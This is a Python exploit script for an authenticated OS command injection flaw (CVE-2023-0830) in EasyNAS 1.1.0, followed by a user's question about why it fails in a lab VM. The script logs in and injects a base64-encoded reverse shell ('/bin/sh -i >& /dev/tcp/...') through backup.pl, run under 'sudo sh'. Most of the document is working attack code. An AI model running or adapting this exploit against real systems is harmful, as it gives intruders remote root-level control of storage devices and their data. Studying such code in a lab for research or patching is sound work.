EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Date: 2023-02-09
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.1.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#!/usr/bin/python3
# NOTE: a shebang is only honoured on the very first line of a file; placed here it is
# just a comment, so run the script as `python3 exploit.py ...` or move it to line 1.
import base64
import sys
import time
import urllib.parse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
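# Self-signed certificates are the norm on NAS appliances, so every request below is
# sent with verify=False and urllib3's warning about that is silenced in main().

# Text that EasyNAS's login.pl serves back when authentication fails.
LOGIN_PAGE_MARKER = 'Login to EasyNAS'
# Seconds to wait for backup.pl. A successful reverse shell keeps the CGI process alive,
# so the request timing out is the expected "it worked" signal. A slow appliance can trip
# the same timeout, which is why every outcome still tells the operator to check the listener.
EXPLOIT_TIMEOUT = 3
USER_AGENT = 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'


def normalize_base_url(url: str) -> str:
    """Return the target as a scheme-qualified base URL without a trailing slash.

    The usage line advertises ``http(s)://url``, but the original request lines
    hard-coded ``https://`` in front of whatever was passed, so a caller who followed
    the usage text ended up requesting ``https://https://host/...``. Accept both forms:
    a bare ``host[:port]`` is defaulted to HTTPS, a value that already carries a scheme
    is used as given.
    """
    url = url.strip().rstrip("/")
    if url.lower().startswith(("http://", "https://")):
        return url
    return f"https://{url}"


def build_payload(listener_ip: str, listener_port: str) -> str:
    """Return the URL-encoded, base64-wrapped reverse-shell command.

    The command is base64-encoded so that no shell metacharacters from the listener
    address survive into the injected ``name`` parameter; the injected command line
    decodes it on the target and pipes it to ``sudo sh``. ``urllib.parse.quote`` turns
    the ``+`` and ``=`` of base64 into ``%2B``/``%3D`` so they are not eaten by query-
    string parsing. Note that ``>& /dev/tcp/...`` is a bash-ism: it only works when the
    ``sh`` the payload runs under is bash (or another shell emulating ``/dev/tcp``).
    """
    command = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(listener_ip, listener_port)
    encoded = base64.b64encode(command.encode()).decode()
    return urllib.parse.quote(encoded)


def build_exploit_url(base_url: str, payload: str) -> str:
    """Return the backup.pl URL carrying the injected ``name`` parameter.

    Decoded, the ``name`` value is ``|echo <b64> | base64 -d | sudo sh ||a #``: the
    leading pipe breaks out of whatever command backup.pl builds, and the trailing
    ``||a #`` comments out the remainder of that command line.
    """
    return (
        f"{base_url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup"
        f"&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23"
    )


def login(session, base_url: str, user: str, password: str) -> bool:
    """POST the credentials to login.pl on ``session``; return True when they were accepted.

    ``session`` is a ``requests.Session`` that keeps the resulting cookie. A failed
    login is recognised by the login form being served again; any other response is
    treated as success. Raises ``requests.exceptions.RequestException`` on transport errors.
    """
    login_data = {
        'usr': user,
        'pwd': password,
        'action': 'login',
    }
    response = session.post(f"{base_url}/easynas/login.pl", data=login_data, verify=False)
    return LOGIN_PAGE_MARKER not in response.text


def main(argv=None):
    """Log in, fire the injected backup request and report what the response suggests.

    ``argv`` defaults to ``sys.argv``: script name, target, username, password,
    listener IP, listener port. Exits 1 on usage, connection or login failure.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) < 6:
        print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
        sys.exit(1)
    base_url = normalize_base_url(argv[1])
    user, password = argv[2], argv[3]
    payload = build_payload(argv[4], argv[5])

    # Disable the insecure request warning (see the note at the top of this section).
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    session = requests.Session()

    print("Sending login request...")
    try:
        authenticated = login(session, base_url, user, password)
    except requests.exceptions.RequestException as exc:
        print(f"[-] Could not reach {base_url}: {exc}")
        sys.exit(1)
    if not authenticated:
        print("Unsuccessful login")
        sys.exit(1)
    print("Login successful")

    # send the exploit request
    exploit_url = build_exploit_url(base_url, payload)
    try:
        exploit_response = session.get(
            exploit_url,
            headers={'User-Agent': USER_AGENT},
            timeout=EXPLOIT_TIMEOUT,
            verify=False,
        )
    except requests.exceptions.ReadTimeout:
        # The injected shell holds the CGI open, so a read timeout is the success signal.
        print(f"[+] backup.pl did not answer within {EXPLOIT_TIMEOUT}s - that is what the "
              "reverse shell holding the CGI open looks like. Check your listener.")
        sys.exit(0)
    except requests.exceptions.RequestException as exc:
        print(f"[-] Exploit request failed: {exc}")
        sys.exit(1)

    if exploit_response.status_code == 200:
        # backup.pl came back normally, so the injected command did not block.
        print("[-] Exploit failed, system is patched or credentials are wrong.")
    else:
        # The original script reported any non-200 as success, but a 404 (different
        # version / path) or 403 says nothing about whether the command ran.
        print(f"[?] backup.pl returned HTTP {exploit_response.status_code} without hanging; "
              "the injection may not have run. Check your listener.")


if __name__ == "__main__":
    main()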
hello, can you please help me with this?
I downloaded the vulnerable version on virtual box.
I can ping it.
I created an account and was able to log in.
I tried to run the exploit with nc running, the code runs and gives me ([-] Everything seems ok, check your listener.)
nc doesn't show anything. what could be the problem? thanks